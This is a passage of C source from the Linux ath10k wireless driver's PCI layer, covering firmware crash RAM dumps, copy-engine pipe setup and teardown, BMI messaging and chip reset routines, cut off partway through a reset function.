/* if an error happened, returns < 0; otherwise returns the length */
static int ath10k_pci_dump_memory_reg(struct ath10k *ar,
				      const struct ath10k_mem_region *region,
				      u8 *buf)
{
	struct ath10k_pci *ar_pci = ath10k_pci_priv(ar);
	u32 i;

	for (i = 0; i < region->len; i += 4)
		*(u32 *)(buf + i) = ioread32(ar_pci->mem + region->start + i);

	return region->len;
}

/* if an error happened, returns < 0; otherwise returns the length */
static int ath10k_pci_dump_memory_generic(struct ath10k *ar,
					  const struct ath10k_mem_region *current_region,
					  u8 *buf)
{
	int ret;

	if (current_region->section_table.size > 0)
		/* Copy each section individually. */
		return ath10k_pci_dump_memory_section(ar,
						      current_region,
						      buf,
						      current_region->len);

	/* No individual memory sections defined so we can
	 * copy the entire memory region.
	 */
	ret = ath10k_pci_diag_read_mem(ar,
				       current_region->start,
				       buf,
				       current_region->len);
	if (ret) {
		ath10k_warn(ar, "failed to copy ramdump region %s: %d\n",
			    current_region->name, ret);
		return ret;
	}

	return current_region->len;
}

static void ath10k_pci_dump_memory(struct ath10k *ar,
				   struct ath10k_fw_crash_data *crash_data)
{
	const struct ath10k_hw_mem_layout *mem_layout;
	const struct ath10k_mem_region *current_region;
	struct ath10k_dump_ram_data_hdr *hdr;
	u32 count, shift;
	size_t buf_len;
	int ret, i;
	u8 *buf;

	lockdep_assert_held(&ar->dump_mutex);

	if (!crash_data)
		return;

	mem_layout = ath10k_coredump_get_mem_layout(ar);
	if (!mem_layout)
		return;

	current_region = &mem_layout->region_table.regions[0];

	buf = crash_data->ramdump_buf;
	buf_len = crash_data->ramdump_buf_len;
	memset(buf, 0, buf_len);

	for (i = 0; i < mem_layout->region_table.size; i++) {
		count = 0;

		if (current_region->len > buf_len) {
			ath10k_warn(ar, "memory region %s size %d is larger than the remaining ramdump buffer size %zu\n",
				    current_region->name,
				    current_region->len,
				    buf_len);
			break;
		}

		/* To get IRAM dump, the host driver needs to switch target
		 * ram config from DRAM to IRAM.
		 */
		if (current_region->type == ATH10K_MEM_REGION_TYPE_IRAM1 ||
		    current_region->type == ATH10K_MEM_REGION_TYPE_IRAM2) {
			shift = current_region->start >> 20;

			ret = ath10k_pci_set_ram_config(ar, shift);
			if (ret) {
				ath10k_warn(ar, "failed to switch ram config to IRAM for section %s: %d\n",
					    current_region->name, ret);
				break;
			}
		}

		/* Reserve space for the header. */
		hdr = (void *)buf;
		buf += sizeof(*hdr);
		buf_len -= sizeof(*hdr);

		switch (current_region->type) {
		case ATH10K_MEM_REGION_TYPE_IOSRAM:
			count = ath10k_pci_dump_memory_sram(ar, current_region, buf);
			break;
		case ATH10K_MEM_REGION_TYPE_IOREG:
			count = ath10k_pci_dump_memory_reg(ar, current_region, buf);
			break;
		default:
			ret = ath10k_pci_dump_memory_generic(ar, current_region, buf);
			if (ret < 0)
				break;

			count = ret;
			break;
		}

		hdr->region_type = cpu_to_le32(current_region->type);
		hdr->start = cpu_to_le32(current_region->start);
		hdr->length = cpu_to_le32(count);

		if (count == 0)
			/* Note: the header remains, just with zero length.
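			 * Each region is emitted as a struct
			 * ath10k_dump_ram_data_hdr immediately followed by
			 * `count` payload bytes, so a parser can still walk
			 * past an empty region.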
*/ break; buf += count; buf_len -= count; current_region++; } } static void ath10k_pci_fw_dump_work(struct work_struct *work) { struct ath10k_pci *ar_pci = container_of(work, struct ath10k_pci, dump_work); struct ath10k_fw_crash_data *crash_data; struct ath10k *ar = ar_pci->ar; char guid[UUID_STRING_LEN + 1]; mutex_lock(&ar->dump_mutex); spin_lock_bh(&ar->data_lock); ar->stats.fw_crash_counter++; spin_unlock_bh(&ar->data_lock); crash_data = ath10k_coredump_new(ar); if (crash_data) scnprintf(guid, sizeof(guid), "%pUl", &crash_data->guid); else scnprintf(guid, sizeof(guid), "n/a"); ath10k_err(ar, "firmware crashed! (guid %s)\n", guid); ath10k_print_driver_info(ar); ath10k_pci_dump_registers(ar, crash_data); ath10k_ce_dump_registers(ar, crash_data); ath10k_pci_dump_memory(ar, crash_data); mutex_unlock(&ar->dump_mutex); queue_work(ar->workqueue, &ar->restart_work); } static void ath10k_pci_fw_crashed_dump(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); queue_work(ar->workqueue, &ar_pci->dump_work); } void ath10k_pci_hif_send_complete_check(struct ath10k *ar, u8 pipe, int force) { ath10k_dbg(ar, ATH10K_DBG_PCI, "pci hif send complete check\n"); if (!force) { int resources; /* * Decide whether to actually poll for completions, or just * wait for a later chance. * If there seem to be plenty of resources left, then just wait * since checking involves reading a CE register, which is a * relatively expensive operation. */ resources = ath10k_pci_hif_get_free_queue_number(ar, pipe); /* * If at least 50% of the total resources are still available, * don't bother checking again yet. */ if (resources > (host_ce_config_wlan[pipe].src_nentries >> 1)) return; } ath10k_ce_per_engine_service(ar, pipe); } static void ath10k_pci_rx_retry_sync(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); del_timer_sync(&ar_pci->rx_post_retry); } int ath10k_pci_hif_map_service_to_pipe(struct ath10k *ar, u16 service_id, u8 *ul_pipe, u8 *dl_pipe) { const struct service_to_pipe *entry; bool ul_set = false, dl_set = false; int i; ath10k_dbg(ar, ATH10K_DBG_PCI, "pci hif map service\n"); for (i = 0; i < ARRAY_SIZE(target_service_to_ce_map_wlan); i++) { entry = &target_service_to_ce_map_wlan[i]; if (__le32_to_cpu(entry->service_id) != service_id) continue; switch (__le32_to_cpu(entry->pipedir)) { case PIPEDIR_NONE: break; case PIPEDIR_IN: WARN_ON(dl_set); *dl_pipe = __le32_to_cpu(entry->pipenum); dl_set = true; break; case PIPEDIR_OUT: WARN_ON(ul_set); *ul_pipe = __le32_to_cpu(entry->pipenum); ul_set = true; break; case PIPEDIR_INOUT: WARN_ON(dl_set); WARN_ON(ul_set); *dl_pipe = __le32_to_cpu(entry->pipenum); *ul_pipe = __le32_to_cpu(entry->pipenum); dl_set = true; ul_set = true; break; } } if (!ul_set || !dl_set) return -ENOENT; return 0; } void ath10k_pci_hif_get_default_pipe(struct ath10k *ar, u8 *ul_pipe, u8 *dl_pipe) { ath10k_dbg(ar, ATH10K_DBG_PCI, "pci hif get default pipe\n"); (void)ath10k_pci_hif_map_service_to_pipe(ar, ATH10K_HTC_SVC_ID_RSVD_CTRL, ul_pipe, dl_pipe); } void ath10k_pci_irq_msi_fw_mask(struct ath10k *ar) { u32 val; switch (ar->hw_rev) { case ATH10K_HW_QCA988X: case ATH10K_HW_QCA9887: case ATH10K_HW_QCA6174: case ATH10K_HW_QCA9377: val = ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS); val &= ~CORE_CTRL_PCIE_REG_31_MASK; ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS, val); break; case ATH10K_HW_QCA99X0: case ATH10K_HW_QCA9984: case ATH10K_HW_QCA9888: case ATH10K_HW_QCA4019: /* TODO: Find appropriate register configuration for 
QCA99X0 * to mask irq/MSI. */ break; case ATH10K_HW_WCN3990: break; } } static void ath10k_pci_irq_msi_fw_unmask(struct ath10k *ar) { u32 val; switch (ar->hw_rev) { case ATH10K_HW_QCA988X: case ATH10K_HW_QCA9887: case ATH10K_HW_QCA6174: case ATH10K_HW_QCA9377: val = ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS); val |= CORE_CTRL_PCIE_REG_31_MASK; ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS, val); break; case ATH10K_HW_QCA99X0: case ATH10K_HW_QCA9984: case ATH10K_HW_QCA9888: case ATH10K_HW_QCA4019: /* TODO: Find appropriate register configuration for QCA99X0 * to unmask irq/MSI. */ break; case ATH10K_HW_WCN3990: break; } } static void ath10k_pci_irq_disable(struct ath10k *ar) { ath10k_ce_disable_interrupts(ar); ath10k_pci_disable_and_clear_legacy_irq(ar); ath10k_pci_irq_msi_fw_mask(ar); } static void ath10k_pci_irq_sync(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); synchronize_irq(ar_pci->pdev->irq); } static void ath10k_pci_irq_enable(struct ath10k *ar) { ath10k_ce_enable_interrupts(ar); ath10k_pci_enable_legacy_irq(ar); ath10k_pci_irq_msi_fw_unmask(ar); } static int ath10k_pci_hif_start(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif start\n"); napi_enable(&ar->napi); ath10k_pci_irq_enable(ar); ath10k_pci_rx_post(ar); pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL, ar_pci->link_ctl); return 0; } static void ath10k_pci_rx_pipe_cleanup(struct ath10k_pci_pipe *pci_pipe) { struct ath10k *ar; struct ath10k_ce_pipe *ce_pipe; struct ath10k_ce_ring *ce_ring; struct sk_buff *skb; int i; ar = pci_pipe->hif_ce_state; ce_pipe = pci_pipe->ce_hdl; ce_ring = ce_pipe->dest_ring; if (!ce_ring) return; if (!pci_pipe->buf_sz) return; for (i = 0; i < ce_ring->nentries; i++) { skb = ce_ring->per_transfer_context[i]; if (!skb) continue; ce_ring->per_transfer_context[i] = NULL; dma_unmap_single(ar->dev, ATH10K_SKB_RXCB(skb)->paddr, skb->len + skb_tailroom(skb), DMA_FROM_DEVICE); dev_kfree_skb_any(skb); } } static void ath10k_pci_tx_pipe_cleanup(struct ath10k_pci_pipe *pci_pipe) { struct ath10k *ar; struct ath10k_ce_pipe *ce_pipe; struct ath10k_ce_ring *ce_ring; struct sk_buff *skb; int i; ar = pci_pipe->hif_ce_state; ce_pipe = pci_pipe->ce_hdl; ce_ring = ce_pipe->src_ring; if (!ce_ring) return; if (!pci_pipe->buf_sz) return; for (i = 0; i < ce_ring->nentries; i++) { skb = ce_ring->per_transfer_context[i]; if (!skb) continue; ce_ring->per_transfer_context[i] = NULL; ath10k_htc_tx_completion_handler(ar, skb); } } /* * Cleanup residual buffers for device shutdown: * buffers that were enqueued for receive * buffers that were to be sent * Note: Buffers that had completed but which were * not yet processed are on a completion queue. They * are handled when the completion thread shuts down. 
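 *
 * ath10k_pci_buffer_cleanup() below simply walks every pipe and runs the
 * rx/tx cleanup helpers above on each of them.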
 */
static void ath10k_pci_buffer_cleanup(struct ath10k *ar)
{
	struct ath10k_pci *ar_pci = ath10k_pci_priv(ar);
	int pipe_num;

	for (pipe_num = 0; pipe_num < CE_COUNT; pipe_num++) {
		struct ath10k_pci_pipe *pipe_info;

		pipe_info = &ar_pci->pipe_info[pipe_num];
		ath10k_pci_rx_pipe_cleanup(pipe_info);
		ath10k_pci_tx_pipe_cleanup(pipe_info);
	}
}

void ath10k_pci_ce_deinit(struct ath10k *ar)
{
	int i;

	for (i = 0; i < CE_COUNT; i++)
		ath10k_ce_deinit_pipe(ar, i);
}

void ath10k_pci_flush(struct ath10k *ar)
{
	ath10k_pci_rx_retry_sync(ar);
	ath10k_pci_buffer_cleanup(ar);
}

static void ath10k_pci_hif_stop(struct ath10k *ar)
{
	struct ath10k_pci *ar_pci = ath10k_pci_priv(ar);
	unsigned long flags;

	ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif stop\n");

	ath10k_pci_irq_disable(ar);
	ath10k_pci_irq_sync(ar);
	napi_synchronize(&ar->napi);
	napi_disable(&ar->napi);

	/* Most likely the device has HTT Rx ring configured. The only way to
	 * prevent the device from accessing (and possibly corrupting) host
	 * memory is to reset the chip now.
	 *
	 * There's also no known way of masking MSI interrupts on the device.
	 * For ranged MSI the CE-related interrupts can be masked. However,
	 * regardless of how many MSI interrupts are assigned the first one
	 * is always used for firmware indications (crashes) and cannot be
	 * masked. To prevent the device from asserting the interrupt reset it
	 * before proceeding with cleanup.
	 */
	ath10k_pci_safe_chip_reset(ar);

	ath10k_pci_flush(ar);

	spin_lock_irqsave(&ar_pci->ps_lock, flags);
	WARN_ON(ar_pci->ps_wake_refcount > 0);
	spin_unlock_irqrestore(&ar_pci->ps_lock, flags);
}

int ath10k_pci_hif_exchange_bmi_msg(struct ath10k *ar,
				    void *req, u32 req_len,
				    void *resp, u32 *resp_len)
{
	struct ath10k_pci *ar_pci = ath10k_pci_priv(ar);
	struct ath10k_pci_pipe *pci_tx = &ar_pci->pipe_info[BMI_CE_NUM_TO_TARG];
	struct ath10k_pci_pipe *pci_rx = &ar_pci->pipe_info[BMI_CE_NUM_TO_HOST];
	struct ath10k_ce_pipe *ce_tx = pci_tx->ce_hdl;
	struct ath10k_ce_pipe *ce_rx = pci_rx->ce_hdl;
	dma_addr_t req_paddr = 0;
	dma_addr_t resp_paddr = 0;
	struct bmi_xfer xfer = {};
	void *treq, *tresp = NULL;
	int ret = 0;

	might_sleep();

	if (resp && !resp_len)
		return -EINVAL;

	if (resp && resp_len && *resp_len == 0)
		return -EINVAL;

	treq = kmemdup(req, req_len, GFP_KERNEL);
	if (!treq)
		return -ENOMEM;

	req_paddr = dma_map_single(ar->dev, treq, req_len, DMA_TO_DEVICE);
	ret = dma_mapping_error(ar->dev, req_paddr);
	if (ret) {
		ret = -EIO;
		goto err_dma;
	}

	if (resp && resp_len) {
		tresp = kzalloc(*resp_len, GFP_KERNEL);
		if (!tresp) {
			ret = -ENOMEM;
			goto err_req;
		}

		resp_paddr = dma_map_single(ar->dev, tresp, *resp_len,
					    DMA_FROM_DEVICE);
		ret = dma_mapping_error(ar->dev, resp_paddr);
		if (ret) {
			ret = -EIO;
			goto err_req;
		}

		xfer.wait_for_resp = true;
		xfer.resp_len = 0;

		ath10k_ce_rx_post_buf(ce_rx, &xfer, resp_paddr);
	}

	ret = ath10k_ce_send(ce_tx, &xfer, req_paddr, req_len, -1, 0);
	if (ret)
		goto err_resp;

	ret = ath10k_pci_bmi_wait(ar, ce_tx, ce_rx, &xfer);
	if (ret) {
		dma_addr_t unused_buffer;
		unsigned int unused_nbytes;
		unsigned int unused_id;

		ath10k_ce_cancel_send_next(ce_tx, NULL, &unused_buffer,
					   &unused_nbytes, &unused_id);
	} else {
		/* non-zero means we did not time out */
		ret = 0;
	}

err_resp:
	if (resp) {
		dma_addr_t unused_buffer;

		ath10k_ce_revoke_recv_next(ce_rx, NULL, &unused_buffer);
		dma_unmap_single(ar->dev, resp_paddr,
				 *resp_len, DMA_FROM_DEVICE);
	}
err_req:
	dma_unmap_single(ar->dev, req_paddr, req_len, DMA_TO_DEVICE);

	if (ret == 0 && resp_len) {
		*resp_len = min(*resp_len, xfer.resp_len);
		memcpy(resp, tresp, xfer.resp_len);
	}
err_dma:
	kfree(treq);
	kfree(tresp);
return ret; } static void ath10k_pci_bmi_send_done(struct ath10k_ce_pipe *ce_state) { struct bmi_xfer *xfer; if (ath10k_ce_completed_send_next(ce_state, (void **)&xfer)) return; xfer->tx_done = true; } static void ath10k_pci_bmi_recv_data(struct ath10k_ce_pipe *ce_state) { struct ath10k *ar = ce_state->ar; struct bmi_xfer *xfer; unsigned int nbytes; if (ath10k_ce_completed_recv_next(ce_state, (void **)&xfer, &nbytes)) return; if (WARN_ON_ONCE(!xfer)) return; if (!xfer->wait_for_resp) { ath10k_warn(ar, "unexpected: BMI data received; ignoring\n"); return; } xfer->resp_len = nbytes; xfer->rx_done = true; } static int ath10k_pci_bmi_wait(struct ath10k *ar, struct ath10k_ce_pipe *tx_pipe, struct ath10k_ce_pipe *rx_pipe, struct bmi_xfer *xfer) { unsigned long timeout = jiffies + BMI_COMMUNICATION_TIMEOUT_HZ; unsigned long started = jiffies; unsigned long dur; int ret; while (time_before_eq(jiffies, timeout)) { ath10k_pci_bmi_send_done(tx_pipe); ath10k_pci_bmi_recv_data(rx_pipe); if (xfer->tx_done && (xfer->rx_done == xfer->wait_for_resp)) { ret = 0; goto out; } schedule(); } ret = -ETIMEDOUT; out: dur = jiffies - started; if (dur > HZ) ath10k_dbg(ar, ATH10K_DBG_BMI, "bmi cmd took %lu jiffies hz %d ret %d\n", dur, HZ, ret); return ret; } /* * Send an interrupt to the device to wake up the Target CPU * so it has an opportunity to notice any changed state. */ static int ath10k_pci_wake_target_cpu(struct ath10k *ar) { u32 addr, val; addr = SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS; val = ath10k_pci_read32(ar, addr); val |= CORE_CTRL_CPU_INTR_MASK; ath10k_pci_write32(ar, addr, val); return 0; } static int ath10k_pci_get_num_banks(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); switch (ar_pci->pdev->device) { case QCA988X_2_0_DEVICE_ID_UBNT: case QCA988X_2_0_DEVICE_ID: case QCA99X0_2_0_DEVICE_ID: case QCA9888_2_0_DEVICE_ID: case QCA9984_1_0_DEVICE_ID: case QCA9887_1_0_DEVICE_ID: return 1; case QCA6164_2_1_DEVICE_ID: case QCA6174_2_1_DEVICE_ID: switch (MS(ar->bus_param.chip_id, SOC_CHIP_ID_REV)) { case QCA6174_HW_1_0_CHIP_ID_REV: case QCA6174_HW_1_1_CHIP_ID_REV: case QCA6174_HW_2_1_CHIP_ID_REV: case QCA6174_HW_2_2_CHIP_ID_REV: return 3; case QCA6174_HW_1_3_CHIP_ID_REV: return 2; case QCA6174_HW_3_0_CHIP_ID_REV: case QCA6174_HW_3_1_CHIP_ID_REV: case QCA6174_HW_3_2_CHIP_ID_REV: return 9; } break; case QCA9377_1_0_DEVICE_ID: return 9; } ath10k_warn(ar, "unknown number of banks, assuming 1\n"); return 1; } static int ath10k_bus_get_num_banks(struct ath10k *ar) { struct ath10k_ce *ce = ath10k_ce_priv(ar); return ce->bus_ops->get_num_banks(ar); } int ath10k_pci_init_config(struct ath10k *ar) { u32 interconnect_targ_addr; u32 pcie_state_targ_addr = 0; u32 pipe_cfg_targ_addr = 0; u32 svc_to_pipe_map = 0; u32 pcie_config_flags = 0; u32 ealloc_value; u32 ealloc_targ_addr; u32 flag2_value; u32 flag2_targ_addr; int ret = 0; /* Download to Target the CE Config and the service-to-CE map */ interconnect_targ_addr = host_interest_item_address(HI_ITEM(hi_interconnect_state)); /* Supply Target-side CE configuration */ ret = ath10k_pci_diag_read32(ar, interconnect_targ_addr, &pcie_state_targ_addr); if (ret != 0) { ath10k_err(ar, "Failed to get pcie state addr: %d\n", ret); return ret; } if (pcie_state_targ_addr == 0) { ret = -EIO; ath10k_err(ar, "Invalid pcie state addr\n"); return ret; } ret = ath10k_pci_diag_read32(ar, (pcie_state_targ_addr + offsetof(struct pcie_state, pipe_cfg_addr)), &pipe_cfg_targ_addr); if (ret != 0) { ath10k_err(ar, "Failed to get pipe cfg addr: %d\n", ret); return ret; } 
	if (pipe_cfg_targ_addr == 0) {
		ret = -EIO;
		ath10k_err(ar, "Invalid pipe cfg addr\n");
		return ret;
	}

	ret = ath10k_pci_diag_write_mem(ar, pipe_cfg_targ_addr,
					target_ce_config_wlan,
					sizeof(struct ce_pipe_config) *
					NUM_TARGET_CE_CONFIG_WLAN);
	if (ret != 0) {
		ath10k_err(ar, "Failed to write pipe cfg: %d\n", ret);
		return ret;
	}

	ret = ath10k_pci_diag_read32(ar, (pcie_state_targ_addr +
					  offsetof(struct pcie_state,
						   svc_to_pipe_map)),
				     &svc_to_pipe_map);
	if (ret != 0) {
		ath10k_err(ar, "Failed to get svc/pipe map: %d\n", ret);
		return ret;
	}

	if (svc_to_pipe_map == 0) {
		ret = -EIO;
		ath10k_err(ar, "Invalid svc_to_pipe map\n");
		return ret;
	}

	ret = ath10k_pci_diag_write_mem(ar, svc_to_pipe_map,
					target_service_to_ce_map_wlan,
					sizeof(target_service_to_ce_map_wlan));
	if (ret != 0) {
		ath10k_err(ar, "Failed to write svc/pipe map: %d\n", ret);
		return ret;
	}

	ret = ath10k_pci_diag_read32(ar, (pcie_state_targ_addr +
					  offsetof(struct pcie_state,
						   config_flags)),
				     &pcie_config_flags);
	if (ret != 0) {
		ath10k_err(ar, "Failed to get pcie config_flags: %d\n", ret);
		return ret;
	}

	pcie_config_flags &= ~PCIE_CONFIG_FLAG_ENABLE_L1;

	ret = ath10k_pci_diag_write32(ar, (pcie_state_targ_addr +
					   offsetof(struct pcie_state,
						    config_flags)),
				      pcie_config_flags);
	if (ret != 0) {
		ath10k_err(ar, "Failed to write pcie config_flags: %d\n", ret);
		return ret;
	}

	/* configure early allocation */
	ealloc_targ_addr = host_interest_item_address(HI_ITEM(hi_early_alloc));

	ret = ath10k_pci_diag_read32(ar, ealloc_targ_addr, &ealloc_value);
	if (ret != 0) {
		ath10k_err(ar, "Failed to get early alloc val: %d\n", ret);
		return ret;
	}

	/* first bank is switched to IRAM */
	ealloc_value |= ((HI_EARLY_ALLOC_MAGIC << HI_EARLY_ALLOC_MAGIC_SHIFT) &
			 HI_EARLY_ALLOC_MAGIC_MASK);
	ealloc_value |= ((ath10k_bus_get_num_banks(ar) <<
			  HI_EARLY_ALLOC_IRAM_BANKS_SHIFT) &
			 HI_EARLY_ALLOC_IRAM_BANKS_MASK);

	ret = ath10k_pci_diag_write32(ar, ealloc_targ_addr, ealloc_value);
	if (ret != 0) {
		ath10k_err(ar, "Failed to set early alloc val: %d\n", ret);
		return ret;
	}

	/* Tell Target to proceed with initialization */
	flag2_targ_addr = host_interest_item_address(HI_ITEM(hi_option_flag2));

	ret = ath10k_pci_diag_read32(ar, flag2_targ_addr, &flag2_value);
	if (ret != 0) {
		ath10k_err(ar, "Failed to get option val: %d\n", ret);
		return ret;
	}

	flag2_value |= HI_OPTION_EARLY_CFG_DONE;

	ret = ath10k_pci_diag_write32(ar, flag2_targ_addr, flag2_value);
	if (ret != 0) {
		ath10k_err(ar, "Failed to set option val: %d\n", ret);
		return ret;
	}

	return 0;
}

static void ath10k_pci_override_ce_config(struct ath10k *ar)
{
	struct ce_attr *attr;
	struct ce_pipe_config *config;

	/* For QCA6174 we're overriding the Copy Engine 5 configuration,
	 * since it is currently used for another feature.
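	 *
	 * The overrides below shrink the host-side CE5 attributes, turn the
	 * target-side pipe into a host->target (PIPEDIR_OUT) pipe with
	 * 2048-byte buffers and point entry 15 of the service map at pipe 1.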
*/ /* Override Host's Copy Engine 5 configuration */ attr = &host_ce_config_wlan[5]; attr->src_sz_max = 0; attr->dest_nentries = 0; /* Override Target firmware's Copy Engine configuration */ config = &target_ce_config_wlan[5]; config->pipedir = __cpu_to_le32(PIPEDIR_OUT); config->nbytes_max = __cpu_to_le32(2048); /* Map from service/endpoint to Copy Engine */ target_service_to_ce_map_wlan[15].pipenum = __cpu_to_le32(1); } int ath10k_pci_alloc_pipes(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct ath10k_pci_pipe *pipe; struct ath10k_ce *ce = ath10k_ce_priv(ar); int i, ret; for (i = 0; i < CE_COUNT; i++) { pipe = &ar_pci->pipe_info[i]; pipe->ce_hdl = &ce->ce_states[i]; pipe->pipe_num = i; pipe->hif_ce_state = ar; ret = ath10k_ce_alloc_pipe(ar, i, &host_ce_config_wlan[i]); if (ret) { ath10k_err(ar, "failed to allocate copy engine pipe %d: %d\n", i, ret); return ret; } /* Last CE is Diagnostic Window */ if (i == CE_DIAG_PIPE) { ar_pci->ce_diag = pipe->ce_hdl; continue; } pipe->buf_sz = (size_t)(host_ce_config_wlan[i].src_sz_max); } return 0; } void ath10k_pci_free_pipes(struct ath10k *ar) { int i; for (i = 0; i < CE_COUNT; i++) ath10k_ce_free_pipe(ar, i); } int ath10k_pci_init_pipes(struct ath10k *ar) { int i, ret; for (i = 0; i < CE_COUNT; i++) { ret = ath10k_ce_init_pipe(ar, i, &host_ce_config_wlan[i]); if (ret) { ath10k_err(ar, "failed to initialize copy engine pipe %d: %d\n", i, ret); return ret; } } return 0; } static bool ath10k_pci_has_fw_crashed(struct ath10k *ar) { return ath10k_pci_read32(ar, FW_INDICATOR_ADDRESS) & FW_IND_EVENT_PENDING; } static void ath10k_pci_fw_crashed_clear(struct ath10k *ar) { u32 val; val = ath10k_pci_read32(ar, FW_INDICATOR_ADDRESS); val &= ~FW_IND_EVENT_PENDING; ath10k_pci_write32(ar, FW_INDICATOR_ADDRESS, val); } static bool ath10k_pci_has_device_gone(struct ath10k *ar) { u32 val; val = ath10k_pci_read32(ar, FW_INDICATOR_ADDRESS); return (val == 0xffffffff); } /* this function effectively clears target memory controller assert line */ static void ath10k_pci_warm_reset_si0(struct ath10k *ar) { u32 val; val = ath10k_pci_soc_read32(ar, SOC_RESET_CONTROL_ADDRESS); ath10k_pci_soc_write32(ar, SOC_RESET_CONTROL_ADDRESS, val | SOC_RESET_CONTROL_SI0_RST_MASK); val = ath10k_pci_soc_read32(ar, SOC_RESET_CONTROL_ADDRESS); msleep(10); val = ath10k_pci_soc_read32(ar, SOC_RESET_CONTROL_ADDRESS); ath10k_pci_soc_write32(ar, SOC_RESET_CONTROL_ADDRESS, val & ~SOC_RESET_CONTROL_SI0_RST_MASK); val = ath10k_pci_soc_read32(ar, SOC_RESET_CONTROL_ADDRESS); msleep(10); } static void ath10k_pci_warm_reset_cpu(struct ath10k *ar) { u32 val; ath10k_pci_write32(ar, FW_INDICATOR_ADDRESS, 0); val = ath10k_pci_read32(ar, RTC_SOC_BASE_ADDRESS + SOC_RESET_CONTROL_ADDRESS); ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + SOC_RESET_CONTROL_ADDRESS, val | SOC_RESET_CONTROL_CPU_WARM_RST_MASK); } static void ath10k_pci_warm_reset_ce(struct ath10k *ar) { u32 val; val = ath10k_pci_read32(ar, RTC_SOC_BASE_ADDRESS + SOC_RESET_CONTROL_ADDRESS); ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + SOC_RESET_CONTROL_ADDRESS, val | SOC_RESET_CONTROL_CE_RST_MASK); msleep(10); ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + SOC_RESET_CONTROL_ADDRESS, val & ~SOC_RESET_CONTROL_CE_RST_MASK); } static void ath10k_pci_warm_reset_clear_lf(struct ath10k *ar) { u32 val; val = ath10k_pci_read32(ar, RTC_SOC_BASE_ADDRESS + SOC_LF_TIMER_CONTROL0_ADDRESS); ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + SOC_LF_TIMER_CONTROL0_ADDRESS, val & ~SOC_LF_TIMER_CONTROL0_ENABLE_MASK); } static int 
ath10k_pci_warm_reset(struct ath10k *ar)
{
	int ret;

	ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot warm reset\n");

	spin_lock_bh(&ar->data_lock);
	ar->stats.fw_warm_reset_counter++;
	spin_unlock_bh(&ar->data_lock);

	ath10k_pci_irq_disable(ar);

	/* Make sure the target CPU is not doing anything dangerous, e.g. if it
	 * were to access copy engine while host performs copy engine reset
	 * then it is possible for the device to confuse the pci-e controller
	 * to the point of bringing the host system to a complete stop (i.e.
	 * hang).
	 */
	ath10k_pci_warm_reset_si0(ar);
	ath10k_pci_warm_reset_cpu(ar);
	ath10k_pci_init_pipes(ar);
	ath10k_pci_wait_for_target_init(ar);

	ath10k_pci_warm_reset_clear_lf(ar);
	ath10k_pci_warm_reset_ce(ar);
	ath10k_pci_warm_reset_cpu(ar);
	ath10k_pci_init_pipes(ar);

	ret = ath10k_pci_wait_for_target_init(ar);
	if (ret) {
		ath10k_warn(ar, "failed to wait for target init: %d\n", ret);
		return ret;
	}

	ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot warm reset complete\n");

	return 0;
}

static int ath10k_pci_qca99x0_soft_chip_reset(struct ath10k *ar)
{
	ath10k_pci_irq_disable(ar);
	return ath10k_pci_qca99x0_chip_reset(ar);
}

static int ath10k_pci_safe_chip_reset(struct ath10k *ar)
{
	struct ath10k_pci *ar_pci = ath10k_pci_priv(ar);

	if (!ar_pci->pci_soft_reset)
		return -ENOTSUPP;

	return ar_pci->pci_soft_reset(ar);
}

static int ath10k_pci_qca988x_chip_reset(struct ath10k *ar)
{
	int i, ret;
	u32 val;

	ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot 988x chip reset\n");

	/* Some hardware revisions (e.g. CUS223v2) have issues with cold reset.
	 * It is thus preferred to use warm reset which is safer but may not be
	 * able to recover the device from all possible fail scenarios.
	 *
	 * Warm reset doesn't always work on the first try so attempt it a few
	 * times before giving up.
	 */
	for (i = 0; i < ATH10K_PCI_NUM_WARM_RESET_ATTEMPTS; i++) {
		ret = ath10k_pci_warm_reset(ar);
		if (ret) {
			ath10k_warn(ar, "failed to warm reset attempt %d of %d: %d\n",
				    i + 1, ATH10K_PCI_NUM_WARM_RESET_ATTEMPTS,
				    ret);
			continue;
		}

		/* FIXME: Sometimes copy engine doesn't recover after warm
		 * reset. In most cases this needs cold reset. In some of these
		 * cases the device is in such a state that a cold reset may
		 * lock up the host.
		 *
		 * Reading any host interest register via copy engine is
		 * sufficient to verify if device is capable of booting
		 * firmware blob.
		 */
		ret = ath10k_pci_init_pipes(ar);
		if (ret) {
			ath10k_warn(ar, "failed to init copy engine: %d\n",
				    ret);
			continue;
		}

		ret = ath10k_pci_diag_read32(ar, QCA988X_HOST_INTEREST_ADDRESS,
					     &val);
		if (ret) {
			ath10k_warn(ar, "failed to poke copy engine: %d\n",
				    ret);
			continue;
		}

		ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot chip reset complete (warm)\n");
		return 0;
	}

	if (ath10k_pci_reset_mode == ATH10K_PCI_RESET_WARM_ONLY) {
		ath10k_warn(ar, "refusing cold reset as requested\n");
		return -EPERM;
	}

	ret = ath10k_pci_cold_reset(ar);
	if (ret) {
		ath10k_warn(ar, "failed to cold reset: %d\n", ret);
		return ret;
	}

	ret = ath10k_pci_wait_for_target_init(ar);
	if (ret) {
		ath10k_warn(ar, "failed to wait for target after cold reset: %d\n",
			    ret);
		return ret;
	}

